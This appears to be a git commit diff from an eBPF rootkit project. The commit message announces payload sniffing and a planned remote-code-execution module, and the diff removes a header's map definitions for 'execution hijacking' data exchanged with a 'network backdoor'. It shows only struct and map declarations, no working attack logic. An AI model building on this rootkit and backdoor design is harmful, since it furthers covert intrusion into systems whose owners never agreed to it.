Updated my RawTCPLib library with newest version supporting sniffing for payloads. Also new data in preparation for complete RCE module

2025-12-25 02:43:07 +08:00 · 2022-02-16 19:38:39 -05:00
parent 2ae705f037
commit 431a019931
8 changed files with 63 additions and 15 deletions
--- a/src/common/map_prot.h
+++ b/src/common/map_prot.h
@@ -11,19 +11,4 @@
 /*PROTECTED MAPS*/
 //Any attempt to access these maps will be blocked by the rootkit if the program is not whitelisted

-//Execution hijacking, holder of requesting/response data sent from/to the network backdoor
-#define EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN 256
-#define EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN 256
-struct exec_hijack_data{ //Map value
-	char req_buf[EXEC_HIJACK_REQUEST_PROGRAM_MAX_LEN];
-    char res_buf[EXEC_HIJACK_RESPONSE_PROGRAM_MAX_LEN];
-};
-
-struct exec_prot_hijack{ //Map
-	__uint(type, BPF_MAP_TYPE_ARRAY);
-	__uint(max_entries, 1);
-	__type(key, __u32); //just 1 entry allowed
-	__type(value, struct exec_hijack_data);
-} exec_hijack SEC(".maps");
-
 #endif